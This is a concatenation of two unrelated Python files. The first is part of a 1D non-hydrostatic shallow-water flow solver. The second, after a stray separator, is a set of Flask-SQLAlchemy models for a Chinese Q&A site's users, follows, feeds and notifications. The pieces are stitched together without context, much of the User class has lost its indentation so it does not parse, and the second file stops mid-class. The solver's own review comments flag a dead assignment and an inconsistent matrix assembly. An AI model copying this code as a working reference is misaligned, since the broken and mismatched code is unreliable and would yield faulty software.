    return [U_p,U_n]
def make_flux_n_cel_vel2(U,h_flow):
    """Centred (arithmetic-mean) cell fluxes and cell velocities from the
    edge velocities U and edge water heights h_flow.

    Returns [flux, cell_vel], each one element shorter than the inputs.
    """
    left_edges, right_edges = U[0:-1], U[1:]
    flux = 0.5*(left_edges*h_flow[0:-1] + right_edges*h_flow[1:])
    cell_vel = 0.5*(left_edges + right_edges)
    return [flux,cell_vel]
def Solve_1D_Hs_velocities(U_cu,elv_pr,U_pr,h_flow,d,wet,del_t,wave_break,nu_eddy,Cf,adv): #hydrostatic flux solver
    """Semi-implicit 1D hydrostatic momentum update.

    For each interior wet face, combines: optional advection (per-face
    switch `adv`), a weighted smoothing of the previous velocity, extra
    eddy-viscosity dissipation where breaking is flagged, the gravity
    (surface-slope) forcing, and an implicit bottom-friction denominator.
    Returns the updated U_cu (modified in place and returned).
    """
    nx = len(U_pr)
    #[U_p,U_n] = make_flux_n_cel_vel(U_pr,h_flow)
    [flux,cell_vel] = make_flux_n_cel_vel2(U_pr,h_flow)
    for i in range(1,nx-1): #neglect inflow boundary faces
        if wet[i]:
            if adv[i] == 1:
                # conservative advection minus the velocity-divergence part
                advection = (1/h_flow[i])*(flux[i]*cell_vel[i] - flux[i-1]*cell_vel[i-1])/IO.inpt['del_x'] - (U_pr[i]/h_flow[i])*(flux[i] - flux[i-1])/IO.inpt['del_x']
                #advection = U_p[i]*(U_pr[i] - U_pr[i-1])/IO.inpt['del_x'] + U_n[i]*(U_pr[i+1] - U_pr[i])/IO.inpt['del_x']
                # blend the face value with the neighbour average (flux_weight in [0,1])
                weighted_flux = (IO.inpt['flux_weight'] * U_pr[i]) + ((1 - IO.inpt['flux_weight'])* (U_pr[i-1] + U_pr[i+1])/2)
                viscous_term = 0
                if wave_break[i] :
                    # extra dissipation only where breaking was flagged
                    viscous_term = del_t * (nu_eddy[i+1] *(U_pr[i+1] - U_pr[i]) - nu_eddy[i] *(U_pr[i] - U_pr[i-1]))/(h_flow[i] * IO.inpt['del_x']**2)
                numerator = weighted_flux - del_t*advection - (IO.inpt['g'] * del_t* (elv_pr[i] - elv_pr[i-1])/IO.inpt['del_x']) + viscous_term
                denominator = 1 + ( del_t * Cf[i] * abs(U_pr[i]) / (h_flow[i])) # implicit bottom friction
                U_cu[i] = numerator/denominator
            else:
                # same update without the advection term
                weighted_flux = (IO.inpt['flux_weight'] * U_pr[i]) + ((1 - IO.inpt['flux_weight'])* (U_pr[i-1] + U_pr[i+1])/2)
                viscous_term = 0
                if wave_break[i] :
                    viscous_term = del_t * (nu_eddy[i+1] *(U_pr[i+1] - U_pr[i]) - nu_eddy[i] *(U_pr[i] - U_pr[i-1]))/(h_flow[i] * IO.inpt['del_x']**2)
                numerator = weighted_flux - (IO.inpt['g'] * del_t* (elv_pr[i] - elv_pr[i-1])/IO.inpt['del_x']) + viscous_term
                denominator = 1 + ( del_t * Cf[i] * abs(U_pr[i]) / (h_flow[i]))
                U_cu[i] = numerator/denominator
    return U_cu
def TDMA(a,b,c,d):
    """Thomas algorithm for a tridiagonal linear system.

    a: sub-diagonal (length n-1), b: main diagonal (length n),
    c: super-diagonal (length n-1), d: right-hand side (length n).
    Returns the solution vector of length n.
    """
    n = len(d)
    # forward sweep: eliminate the sub-diagonal
    cp = np.zeros(n-1,float)  # modified super-diagonal coefficients
    dp = np.zeros(n, float)   # modified right-hand side
    cp[0] = c[0]/b[0]
    dp[0] = d[0]/b[0]
    for k in range(1,n-1):
        cp[k] = c[k]/(b[k] - a[k-1]*cp[k-1])
    for k in range(1,n):
        dp[k] = (d[k] - a[k-1]*dp[k-1])/(b[k] - a[k-1]*cp[k-1])
    # back substitution
    x = np.zeros(n,float)
    x[n-1] = dp[n-1]
    for k in range(n-1,0,-1):
        x[k-1] = dp[k-1] - cp[k-1]*x[k]
    return x
def Solve_1D_NHs_velocities(U_cu,elv_pr,U_pr,h_flow,d,wet,del_t,wave_break,nu_eddy,Cf,P_nh_cu,P_nh_pr,W_cu,W_pr,bot_grad,W_b_pr,W_b_cu,adv): #non-hydrostatic flux solver
    """Non-hydrostatic 1D momentum update (pressure-correction scheme).

    Steps:
      1. hydrostatic predictor velocity via Solve_1D_Hs_velocities;
      2. bottom vertical velocity W_b from the bed slope (upwinded);
      3. tridiagonal Poisson-type system for the non-hydrostatic pressure,
         assembled only over the active region [0, nx_cut) and solved with
         ILU-preconditioned BiCGStab;
      4. pressure correction of U and update of the vertical velocity W.

    Returns [U_cu, P_nh_cu, W_cu, W_b_cu]. The incoming P_nh_cu, W_cu and
    W_b_cu arguments are discarded and rebuilt.
    """
    P_nh_cu = np.zeros((len(elv_pr)))
    W_cu = np.zeros((len(elv_pr)))
    W_b_cu = np.zeros((len(elv_pr)))
    U_cu_half = np.zeros(len(U_cu))
    U_cu_half[0] = U_cu[0]  # NOTE(review): overwritten by the next call -- has no effect
    U_cu_half = Solve_1D_Hs_velocities(U_cu,elv_pr,U_pr,h_flow,d,wet,del_t,wave_break,nu_eddy,Cf,adv)
    ## calculate the bottom vertical velocity W_b_cu
    nx = len(d)
    for i in range(0,nx):
        if wet[i] :
            if i == 0:
                W_b_cu[i] = - U_cu_half[i]*bot_grad[i]
            else:
                # upwind the bed-slope term on the sign of the predictor velocity
                W_b_cu[i] = - 0.5*(U_cu_half[i]+abs(U_cu_half[i]))*bot_grad[i] - 0.5*(U_cu_half[i]-abs(U_cu_half[i]))*bot_grad[i-1]
    # restrict the pressure solve to the active region: stop at the first
    # shallow (bifur_depth) or dry cell, or at the first breaking cell
    if np.any(bot_grad != 0):
        nx_cut = min([np.where(d >= IO.inpt['bifur_depth'])[0][0], np.where(wet == 0)[0][0]]) -1# min([np.where(d >= -2)[0][0], np.where(wet == 0)[0][0]])
    else:
        nx_cut = nx-1
    if np.any(wave_break == 1):
        if np.where(wave_break == 1)[0][0] < nx_cut:
            nx_cut = np.where(wave_break == 1)[0][0]
    # geometric factor: (surface slope - bed slope) / depth
    A_fac = (np.gradient(elv_pr[0:nx_cut+1]) - bot_grad[0:nx_cut+1])/h_flow[0:nx_cut+1]
    A = np.eye((nx_cut))#tridiagonal matrix
    B = np.zeros((nx_cut)) #system of equations AX=B
    f1 = del_t/(2*(IO.inpt['del_x']**2))
    a = np.zeros((nx_cut))
    b = np.ones((nx_cut))
    c = np.zeros((nx_cut))
    # a[0:nx_cut] = f1*(-1 + A_fac[0:nx_cut])
    # b[0:nx_cut] = f1*(2 + A_fac[0:nx_cut] -A_fac[1:nx_cut+1]) + 2*del_t/(0.5*(h_flow[0:nx_cut]+h_flow[1:nx_cut+1]))**2
    # c[0:nx_cut] = f1*(-1 - A_fac[0:nx_cut])
    for i in range(0,nx_cut):
        # a/b/c are kept for the alternative TDMA solve (commented out below)
        a[i] = f1*(-1 + A_fac[i])
        b[i] = f1*(2 + A_fac[i] -A_fac[i+1]) + 2*del_t/(0.5*(h_flow[i]+h_flow[i+1]))**2
        c[i] = f1*(-1 - A_fac[i+1])
        A[i,i] = f1*(2 + A_fac[i] -A_fac[i+1]) + 2*del_t/(0.5*(h_flow[i]+h_flow[i+1]))**2
        if i != 0:
            A[i,i-1] = f1*(-1 + A_fac[i])
        if i != nx_cut-1:
            # NOTE(review): uses A_fac[i] while c[i] above uses A_fac[i+1]
            # -- the two assemblies disagree; verify which is intended.
            A[i,i+1] = f1*(-1 - A_fac[i])
        # RHS: divergence of the predictor velocity plus vertical-velocity terms
        B[i] = - (U_cu_half[i+1] - U_cu_half[i])/IO.inpt['del_x'] - 2*(W_pr[i] + W_b_pr[i] - 2*W_b_cu[i])/(h_flow[i]+h_flow[i+1])
    ## solve for P_nh_cu with ILU-preconditioned BiCGStab
    M2 = scipy.sparse.linalg.spilu(A)
    M = scipy.sparse.linalg.LinearOperator((nx_cut,nx_cut), M2.solve)
    P_nh_cu[0:nx_cut], exitCode = scipy.sparse.linalg.bicgstab(A, B,M=M,tol=10**-8)
    #P_nh_cu = np.linalg.inv(A).dot(B)
    #P_nh_cu[0:nx_cut] = TDMA(a,b,c,B)
    # pressure correction of the horizontal velocity inside the active region
    nx = len(U_cu)
    for i in range(1,nx_cut+1): #neglect inflow
        pressure_term = 0.5*(P_nh_cu[i] - P_nh_cu[i-1])/IO.inpt['del_x'] + 0.5*((P_nh_cu[i]+P_nh_cu[i-1])*(elv_pr[i] - elv_pr[i-1] - d[i] + d[i-1])/( (h_flow[i]+h_flow[i+1]) *IO.inpt['del_x']))
        U_cu[i] = U_cu_half[i] - pressure_term * del_t
    # outside the active region keep the hydrostatic predictor
    U_cu[nx_cut+1:] = U_cu_half[nx_cut+1:]
    # update the vertical velocity at wet cells
    nx = len(d)
    for i in range(0,nx):
        if wet[i] :
            W_cu[i] = W_pr[i] - (W_b_cu[i] - W_b_pr[i]) + 2*del_t*P_nh_cu[i]/h_flow[i]
    return [U_cu,P_nh_cu,W_cu,W_b_cu]
|
# coding: utf-8
import json
from datetime import datetime, date
from werkzeug.security import generate_password_hash, check_password_hash
from ._base import db
from ._helpers import pinyin, save_object_to_es, delete_object_from_es, search_objects_from_es
class User(db.Model):
"""用户"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(200), unique=True)
name_pinyin = db.Column(db.String(200))
name_edit_count = db.Column(db.Integer, default=2) # 剩余的称呼修改次数
email = db.Column(db.String(100), unique=True)
inactive_email = db.Column(db.String(100))
desc = db.Column(db.String(200), )
avatar = db.Column(db.String(200), default='default_user_avatar.png')
background = db.Column(db.String(200))
password = db.Column(db.String(200))
url_token = db.Column(db.String(100))
location = db.Column(db.String(100))
organization = db.Column(db.String(100))
position = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.now)
last_read_compose_feeds_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览撰写 FEED 的时间
last_read_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览通知的时间
last_read_message_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览消息类通知的时间
last_read_user_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览用户类消息的时间
last_read_thanks_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览感谢类消息的时间
is_active = db.Column(db.Boolean, default=False)
is_admin = db.Column(db.Boolean, default=False)
has_selected_expert_topics = db.Column(db.Boolean, default=False) # 是否选择了擅长话题
has_selected_interesting_topics = db.Column(db.Boolean, default=False) # 是否选择了感兴趣的话题
# 引导
has_finish_guide_steps = db.Column(db.Boolean, default=False) # 是否完成引导步骤
current_guide_step = db.Column(db.Integer, default=1) # 当前处于的引导步骤
# 计数
followers_count = db.Column(db.Integer, default=0)
followings_count = db.Column(db.Integer, default=0)
thanks_count = db.Column(db.Integer, default=0)
shares_count = db.Column(db.Integer, default=0)
upvotes_count = db.Column(db.Integer, default=0)
questions_count = db.Column(db.Integer, default=0)
answers_count = db.Column(db.Integer, default=0)
drafts_count = db.Column(db.Integer, default=0)
# 设置
# 邀请我回答
invite_message_from_all = db.Column(db.Boolean, default=True)
invite_message_via_notification = db.Column(db.Boolean, default=True)
invite_message_via_mail = db.Column(db.Boolean, default=True)
# 赞同/感谢了我的回答
upvote_answer_message_from_all = db.Column(db.Boolean, default=True)
upvote_answer_message_via_notification = db.Column(db.Boolean, default=True)
upvote_answer_message_via_mail = db.Column(db.Boolean, default=True)
# 赞了我的评论
like_comment_message_from_all = db.Column(db.Boolean, default=True)
like_comment_message_via_notification = db.Column(db.Boolean, default=True)
like_comment_message_via_mail = db.Column(db.Boolean, default=True)
# 关注了我
follow_message_from_all = db.Column(db.Boolean, default=True)
follow_message_via_notification = db.Column(db.Boolean, default=True)
follow_message_via_mail = db.Column(db.Boolean, default=True)
# 评论了我
reply_comment_message_from_all = db.Column(db.Boolean, default=True)
reply_comment_message_via_notification = db.Column(db.Boolean, default=True)
reply_comment_message_via_mail = db.Column(db.Boolean, default=True)
# 回答了关注的问题
answer_question_message_from_all = db.Column(db.Boolean, default=True)
answer_question_message_via_notification = db.Column(db.Boolean, default=True)
answer_question_message_via_mail = db.Column(db.Boolean, default=True)
# 每周精选
receive_weekly_digest_message = db.Column(db.Boolean, default=True)
# 不定期的新品/活动通知
receive_activity_message = db.Column(db.Boolean, default=True)
# 被搜索引擎搜索到时显示我的姓名
show_to_search_engine = db.Column(db.Boolean, default=True)
def __setattr__(self, name, value):
# Hash password when set it.
if name == 'password':
value = generate_password_hash(value)
elif name == 'name':
# 为name赋值时,自动设置其拼音
super(User, self).__setattr__('name_pinyin', pinyin(value))
super(User, self).__setattr__(name, value)
def check_password(self, password):
return check_password_hash(self.password, password)
def followed_by_user(self, user_id):
"""该用户是否被当前用户关注"""
return FollowUser.query.filter(FollowUser.follower_id == user_id,
FollowUser.following_id == self.id).count() > 0
def blocked_by_user(self, user_id):
"""该用户是否被当前用户屏蔽"""
return BlockUser.query.filter(BlockUser.blocked_user_id == self.id,
BlockUser.user_id == user_id).count() > 0
@property
def profile_url(self):
"""用户个人主页url"""
if self.url_token:
return '%s/people/%s' % (db.config.get('DC_DOMAIN'), self.url_token)
else:
return '%s/people/%d' % (db.config.get('DC_DOMAIN'), self.id)
@property
def qa_url(self):
"""用户问答url"""
if self.url_token:
return '%s/people/%s/qa' % (db.config.get('DC_DOMAIN'), self.url_token)
else:
return '%s/people/%d/qa' % (db.config.get('DC_DOMAIN'), self.id)
@property
def achievements_url(self):
"""用户成就url"""
if self.url_token:
return '%s/people/%s/achievements' % (db.config.get('DC_DOMAIN'), self.url_token)
else:
return '%s/people/%d/achievements' % (db.config.get('DC_DOMAIN'), self.id)
@property
def avatar_url(self):
"""用户头像"""
return "%s/%s?imageView2/1/w/240" % (db.config.get('CDN_HOST'), self.avatar)
@property
def background_url(self):
"""背景图片"""
return "%s/%s" % (db.config.get('CDN_HOST'), self.background) if self.background else None
@property
def random_answers(self, count=3):
"""随机回答"""
from .answer import Answer
return self.answers.filter(~Answer.hide).order_by(db.func.random()).limit(count)
@property
def expert_topics(self):
"""用户擅长话题
当该用户未选择擅长话题时,返回score最高的话题;
当已选择时,返回选择的擅长话题。
"""
from .topic import UserTopicStatistic
if self.has_selected_expert_topics:
return UserTopicStatistic.query. \
filter(UserTopicStatistic.user_id == self.id,
UserTopicStatistic.selected). \
order_by(UserTopicStatistic.show_order.asc()).limit(8)
else:
return UserTopicStatistic.query. \
filter(UserTopicStatistic.user_id == self.id). \
filter(db.or_(UserTopicStatistic.score != 0, UserTopicStatistic.worked_on)). \
order_by(UserTopicStatistic.worked_on.desc()).order_by(UserTopicStatistic.score.asc()). \
limit(7)
def answered_topics(self, count=3):
"""该用户回答过的话题"""
from .topic import UserTopicStatistic
return UserTopicStatistic.query.filter(UserTopicStatistic.user_id == self.id,
UserTopicStatistic.score != 0). \
order_by(UserTopicStatistic.score.desc()).limit(count)
def save_to_es(self):
"""保存此用户到elasticsearch"""
return save_object_to_es('user', self.id, {
'name': self.name,
'name_pinyin': self.name_pinyin,
'desc': self.desc,
'created_at': self.created_at
})
def delete_from_es(self):
"""从elasticsearch中删除此用户"""
return delete_object_from_es('user', self.id)
@staticmethod
def query_from_es(q, page=1, per_page=10):
"""在elasticsearch中查询用户"""
results = search_objects_from_es(doc_type='user', body={
"query": {
"multi_match": {
"query": q,
"fields": ["name", "name_pinyin", "desc"]
}
},
"highlight": {
"fields": {
"name": {},
"desc": {}
}
},
"from": per_page * (page - 1),
"size": per_page
})
result_users = []
for result in results["hits"]["hits"]:
id = result["_id"]
user = User.query.get(id)
if "highlight" in result:
if "name" in result["highlight"]:
user.highlight_name = result["highlight"]["name"][0]
if "desc" in result["highlight"]:
user.highlight_desc = result["highlight"]["desc"][0]
result_users.append(user)
return result_users, results["hits"]["total"], results['took']
    def __repr__(self):
        # Debug representation: shows the user's display name.
        return '<User %s>' % self.name
class FollowUser(db.Model):
    """Follow relationship between two users (follower -> following)."""
    __bind_key__ = 'dc'
    id = db.Column(db.Integer, primary_key=True)
    created_at = db.Column(db.DateTime, default=datetime.now)
    # The user doing the following; backref gives User.followings.
    follower_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    follower = db.relationship('User', backref=db.backref('followings',
                                                          lazy='dynamic',
                                                          order_by='desc(FollowUser.created_at)'),
                               foreign_keys=[follower_id])
    # The user being followed; backref gives User.followers.
    following_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    following = db.relationship('User', backref=db.backref('followers',
                                                           lazy='dynamic',
                                                           order_by='desc(FollowUser.created_at)'),
                                foreign_keys=[following_id])
    def __repr__(self):
        return '<FollowUser %s>' % self.id
class USER_FEED_KIND(object):
    """User-feed item kinds.

    When a duplicate action occurs (kinds 3-6 below), only the
    creation time of the existing feed item is refreshed.
    """
    ASK_QUESTION = "gN02m2F"  # asked a question
    ANSWER_QUESTION = "J8AbTDT"  # answered a question
    UPVOTE_ANSWER = "F9FqDKa"  # upvoted an answer
    FOLLOW_QUESTION = "4MYN2Ui"  # followed a question
    FOLLOW_TOPIC = "wa3PMng"  # followed a topic
    FOLLOW_USER = "vTw5er5"  # followed a user
class UserFeed(db.Model):
    """A single entry in a user's own activity feed.

    The static helpers below deduplicate: for the "follow"/"upvote" kinds
    an existing entry only gets its ``created_at`` refreshed; for
    ask/answer kinds duplicates are simply not re-created.
    """
    __bind_key__ = 'dc'
    id = db.Column(db.Integer, primary_key=True)
    kind = db.Column(db.String(50))  # one of USER_FEED_KIND
    created_at = db.Column(db.DateTime, default=datetime.now)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    user = db.relationship('User',
                           backref=db.backref('feeds',
                                              lazy='dynamic',
                                              order_by='desc(UserFeed.created_at)'),
                           foreign_keys=[user_id])
    topic_id = db.Column(db.Integer, db.ForeignKey('topic.id'))
    topic = db.relationship('Topic')
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    question = db.relationship('Question')
    answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
    answer = db.relationship('Answer')
    following_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    following = db.relationship('User', foreign_keys=[following_id])
    @staticmethod
    def follow_topic(user, topic):
        """Feed: user followed a topic (refresh timestamp on repeat)."""
        user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.FOLLOW_TOPIC,
                                      UserFeed.topic_id == topic.id).first()
        if user_feed:
            user_feed.created_at = datetime.now()
        else:
            user_feed = UserFeed(kind=USER_FEED_KIND.FOLLOW_TOPIC, user_id=user.id, topic_id=topic.id)
        db.session.add(user_feed)
    @staticmethod
    def follow_user(follower, following):
        """Feed: user followed another user (refresh timestamp on repeat)."""
        user_feed = follower.feeds.filter(UserFeed.kind == USER_FEED_KIND.FOLLOW_USER,
                                          UserFeed.following_id == following.id).first()
        if user_feed:
            user_feed.created_at = datetime.now()
        else:
            user_feed = UserFeed(kind=USER_FEED_KIND.FOLLOW_USER, user_id=follower.id, following_id=following.id)
        db.session.add(user_feed)
    @staticmethod
    def follow_question(user, question):
        """Feed: user followed a question (refresh timestamp on repeat)."""
        user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.FOLLOW_QUESTION,
                                      UserFeed.question_id == question.id).first()
        if user_feed:
            user_feed.created_at = datetime.now()
        else:
            user_feed = UserFeed(kind=USER_FEED_KIND.FOLLOW_QUESTION, user_id=user.id, question_id=question.id)
        db.session.add(user_feed)
    @staticmethod
    def upvote_answer(user, answer):
        """Feed: user upvoted an answer (refresh timestamp on repeat)."""
        user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.UPVOTE_ANSWER,
                                      UserFeed.answer_id == answer.id).first()
        if user_feed:
            user_feed.created_at = datetime.now()
        else:
            user_feed = UserFeed(kind=USER_FEED_KIND.UPVOTE_ANSWER, user_id=user.id, answer_id=answer.id)
        db.session.add(user_feed)
    @staticmethod
    def ask_question(user, question):
        """Feed: user asked a question (created at most once)."""
        user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.ASK_QUESTION,
                                      UserFeed.question_id == question.id).first()
        if not user_feed:
            user_feed = UserFeed(kind=USER_FEED_KIND.ASK_QUESTION, user_id=user.id, question_id=question.id)
            db.session.add(user_feed)
    @staticmethod
    def answer_question(user, answer):
        """Feed: user answered a question (created at most once)."""
        user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.ANSWER_QUESTION,
                                      UserFeed.answer_id == answer.id).first()
        if not user_feed:
            user_feed = UserFeed(kind=USER_FEED_KIND.ANSWER_QUESTION, user_id=user.id, answer_id=answer.id)
            db.session.add(user_feed)
class NOTIFICATION_KIND(object):
    """Notification sub-kinds."""
    # user-related notifications
    FOLLOW_ME = "nK8BQ99"  # followed me
    # thanks-related notifications
    UPVOTE_ANSWER = "Vu69o4V"  # upvoted my answer
    THANK_ANSWER = "gIWr7dg"  # thanked my answer
    LIKE_ANSWER_COMMENT = "1oY78lq"  # liked my comment
    # message-related notifications
    ANSWER_FROM_ASKED_QUESTION = "WFHhwmW"  # answered a question I asked
    COMMENT_ANSWER = "Fk3cIIH"  # commented on my answer
    REPLY_ANSWER_COMMENT = "ibWxLaC"  # replied to my comment
    GOOD_ANSWER_FROM_FOLLOWED_TOPIC = "FAKeWIP"  # great answer under a followed question (admin)
    SYSTEM_NOTI = "ezjwiCu"  # system notification (admin)
    HIDE_ANSWER = "E0CzTCk"  # answer was collapsed (admin)
class NOTIFICATION_KIND_TYPE(object):
    """Groups of notification sub-kinds by top-level category."""
    # message category
    MESSAGE = [NOTIFICATION_KIND.ANSWER_FROM_ASKED_QUESTION,
               NOTIFICATION_KIND.COMMENT_ANSWER,
               NOTIFICATION_KIND.REPLY_ANSWER_COMMENT,
               NOTIFICATION_KIND.GOOD_ANSWER_FROM_FOLLOWED_TOPIC,
               NOTIFICATION_KIND.SYSTEM_NOTI,
               NOTIFICATION_KIND.HIDE_ANSWER]
    # user category
    USER = [NOTIFICATION_KIND.FOLLOW_ME]
    # thanks category
    THANKS = [NOTIFICATION_KIND.UPVOTE_ANSWER,
              NOTIFICATION_KIND.THANK_ANSWER,
              NOTIFICATION_KIND.LIKE_ANSWER_COMMENT]
class Notification(db.Model):
    """A notification delivered to a user.

    For upvote/thank/like kinds, per-sender rows are stored unread=False
    for bookkeeping, while a single ``merged=True`` row per answer/comment
    per day accumulates sender ids in ``senders_list`` and is what the
    user actually sees.
    """
    __bind_key__ = 'dc'
    id = db.Column(db.Integer, primary_key=True)
    kind = db.Column(db.String(50))  # one of NOTIFICATION_KIND
    created_at = db.Column(db.DateTime, default=datetime.now)
    # BUG FIX: pass the callable ``date.today``, not ``date.today()``.
    # The call form evaluated once at import time, so every row created
    # after server start-up was stamped with the start-up date instead of
    # its actual creation date (breaking the same-day merge lookups below).
    created_at_date = db.Column(db.Date, default=date.today)
    unread = db.Column(db.Boolean, default=True)
    # notification receiver
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    user = db.relationship('User',
                           backref=db.backref('notifications',
                                              lazy='dynamic',
                                              order_by='desc(Notification.created_at)'),
                           foreign_keys=[user_id])
    # senders of a merged notification: JSON-encoded list of user ids
    senders_list = db.Column(db.Text)
    merged = db.Column(db.Boolean, default=False)  # whether this row is a merged notification
    sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    sender = db.relationship('User', foreign_keys=[sender_id])
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    question = db.relationship('Question')
    answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
    answer = db.relationship('Answer')
    answer_comment_id = db.Column(db.Integer, db.ForeignKey('answer_comment.id'))
    answer_comment = db.relationship('AnswerComment')
    def last_in_that_day(self, user_id):
        """Return True if this is the user's latest notification of its day."""
        day = self.created_at.date()
        noti = Notification.query. \
            filter(db.func.date(Notification.created_at) == day,
                   Notification.user_id == user_id). \
            order_by(Notification.created_at.desc()).first()
        return noti is not None and noti.id == self.id
    def add_sender(self, sender_id):
        """Add a sender id to the merged senders list (deduplicated)."""
        senders_list = set(json.loads(self.senders_list or "[]"))
        senders_list.add(sender_id)
        self.senders_list = json.dumps(list(senders_list))
    @property
    def senders(self):
        """All senders of this merged notification, or None if empty."""
        if not self.senders_list:
            return None
        senders_id_list = json.loads(self.senders_list)
        return User.query.filter(User.id.in_(senders_id_list))
    @staticmethod
    def follow_me(follower, following):
        """Notification: someone followed me (created at most once)."""
        noti = following.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.FOLLOW_ME,
            Notification.sender_id == follower.id).first()
        if not noti:
            noti = Notification(kind=NOTIFICATION_KIND.FOLLOW_ME, sender_id=follower.id)
            following.notifications.append(noti)
            db.session.add(following)
    @staticmethod
    def upvote_answer(user, answer):
        """Notification: someone upvoted my answer (merged per day)."""
        # Skip if this sender already upvoted this answer before.
        noti = answer.user.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.UPVOTE_ANSWER,
            Notification.sender_id == user.id,
            ~Notification.merged,
            Notification.answer_id == answer.id).first()
        if noti:
            return
        # Bookkeeping row, never shown as unread.
        noti = Notification(kind=NOTIFICATION_KIND.UPVOTE_ANSWER, sender_id=user.id, answer_id=answer.id,
                            user_id=answer.user.id, unread=False)
        db.session.add(noti)
        # Merge into today's visible notification for this answer.
        merged_noti = answer.user.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.UPVOTE_ANSWER,
            Notification.unread,
            Notification.merged,
            Notification.answer_id == answer.id,
            Notification.created_at_date == date.today()).first()
        if merged_noti:
            merged_noti.add_sender(user.id)
            db.session.add(merged_noti)
        else:
            merged_noti = Notification(kind=NOTIFICATION_KIND.UPVOTE_ANSWER, senders_list=json.dumps([user.id]),
                                       answer_id=answer.id, merged=True, user_id=answer.user.id)
            db.session.add(merged_noti)
    @staticmethod
    def thank_answer(user, answer):
        """Notification: someone thanked my answer (merged per day)."""
        noti = answer.user.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.THANK_ANSWER,
            Notification.sender_id == user.id,
            ~Notification.merged,
            Notification.answer_id == answer.id).first()
        if noti:
            return
        noti = Notification(kind=NOTIFICATION_KIND.THANK_ANSWER, sender_id=user.id, answer_id=answer.id,
                            user_id=answer.user.id, unread=False)
        db.session.add(noti)
        # Merge into today's visible notification for this answer.
        merged_noti = answer.user.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.THANK_ANSWER,
            Notification.unread,
            Notification.merged,
            Notification.answer_id == answer.id,
            Notification.created_at_date == date.today()).first()
        if merged_noti:
            merged_noti.add_sender(user.id)
            db.session.add(merged_noti)
        else:
            merged_noti = Notification(kind=NOTIFICATION_KIND.THANK_ANSWER, senders_list=json.dumps([user.id]),
                                       answer_id=answer.id, merged=True, user_id=answer.user.id)
            db.session.add(merged_noti)
    @staticmethod
    def like_answer_comment(user, answer_comment):
        """Notification: someone liked my comment (merged per day)."""
        noti = answer_comment.user.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.LIKE_ANSWER_COMMENT,
            Notification.sender_id == user.id,
            ~Notification.merged,
            Notification.answer_comment_id == answer_comment.id).first()
        if noti:
            return
        noti = Notification(kind=NOTIFICATION_KIND.LIKE_ANSWER_COMMENT, sender_id=user.id,
                            answer_comment_id=answer_comment.id, user_id=answer_comment.user.id, unread=False)
        db.session.add(noti)
        # Merge into today's visible notification for this comment.
        merged_noti = answer_comment.user.notifications.filter(
            Notification.kind == NOTIFICATION_KIND.LIKE_ANSWER_COMMENT,
            Notification.unread,
            Notification.merged,
            Notification.answer_comment_id == answer_comment.id,
            Notification.created_at_date == date.today()).first()
        if merged_noti:
            merged_noti.add_sender(user.id)
            db.session.add(merged_noti)
        else:
            merged_noti = Notification(kind=NOTIFICATION_KIND.LIKE_ANSWER_COMMENT, senders_list=json.dumps([user.id]),
                                       answer_comment_id=answer_comment.id, merged=True, user_id=answer_comment.user.id)
            db.session.add(merged_noti)
    @staticmethod
    def answer_from_asked_question(user, answer):
        """Notification: someone answered a question I asked."""
        noti = Notification(kind=NOTIFICATION_KIND.ANSWER_FROM_ASKED_QUESTION, sender_id=user.id,
                            answer_id=answer.id, user_id=answer.question.user_id)
        db.session.add(noti)
    @staticmethod
    def comment_answer(user, answer_comment):
        """Notification: someone commented on my answer."""
        noti = Notification(kind=NOTIFICATION_KIND.COMMENT_ANSWER, sender_id=user.id,
                            answer_comment_id=answer_comment.id, user_id=answer_comment.answer.user_id)
        db.session.add(noti)
    @staticmethod
    def reply_answer_comment(user, answer_comment):
        """Notification: someone replied to my comment."""
        noti = Notification(kind=NOTIFICATION_KIND.REPLY_ANSWER_COMMENT, sender_id=user.id,
                            answer_comment_id=answer_comment.id, user_id=answer_comment.parent.user_id)
        db.session.add(noti)
class HOME_FEED_KIND(object):
    """Home-page feed item kinds."""
    FOLLOWING_UPVOTE_ANSWER = "UdW38Gw"  # someone I follow upvoted an answer
    FOLLOWING_ASK_QUESTION = "groYn17"  # someone I follow asked a question
    FOLLOWING_ANSWER_QUESTION = "wFyvyTI"  # someone I follow answered a question
    FOLLOWING_FOLLOW_QUESTION = "i1VEDr8"  # someone I follow followed a question
    FANTASTIC_ANSWER_FROM_FOLLOWED_TOPIC = "HVKEV0N"  # great answer under a followed topic
class HomeFeed(db.Model):
    """Home-page feed entry for a logged-in user.

    Each static helper creates an entry at most once per
    (kind, sender, target) combination.
    """
    __bind_key__ = 'dc'
    id = db.Column(db.Integer, primary_key=True)
    kind = db.Column(db.String(50))  # one of HOME_FEED_KIND
    created_at = db.Column(db.DateTime, default=datetime.now)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    user = db.relationship('User',
                           backref=db.backref('home_feeds',
                                              lazy='dynamic',
                                              order_by='desc(HomeFeed.created_at)'),
                           foreign_keys=[user_id])
    sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
